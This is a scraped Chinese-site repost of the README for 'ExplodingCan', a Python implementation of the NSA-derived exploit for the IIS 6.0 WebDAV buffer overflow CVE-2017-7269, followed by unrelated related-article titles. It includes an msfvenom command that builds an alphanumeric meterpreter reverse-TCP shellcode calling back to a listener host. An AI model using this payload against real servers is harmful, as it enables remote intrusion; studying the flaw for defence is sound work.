Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)

Posted 0day5

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)相关的知识,希望对你有一定的参考价值。

ExplodingCan https://github.com/danigargu/explodingcan  

An implementation of ExplodingCan‘s exploit extracted from FuzzBunch, the "Metasploit" of the NSA.

技术分享图片

Details

  • Vulnerability: Microsoft IIS WebDav ‘ScStoragePathFromUrl‘ Remote Buffer Overflow
  • CVE: CVE-2017-7269
  • Disclosure date: March 31 2017
  • Affected product: Microsoft Windows Server 2003 R2 SP2 x86

Why?

Months ago I needed to study this exploit, and finally I implemented it in python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom(metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode



以上是关于Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)的主要内容,如果未能解决你的问题,请参考以下文章

webDAV IIS6 身份验证不适用于匿名禁用

私有云 Windows IIS搭建webdav服务实现公网文件共享「内网穿透」

接口调优——WebAPI 过滤器,IIS WebDAV

安装iis打开网站提示Microsoft JET Database Engine 错误 '80004005'解决办法

中间件安全Apache&IIS解析&短文件&CVE漏洞

IIS6.0(CVE-2017-7269) 缓冲器溢出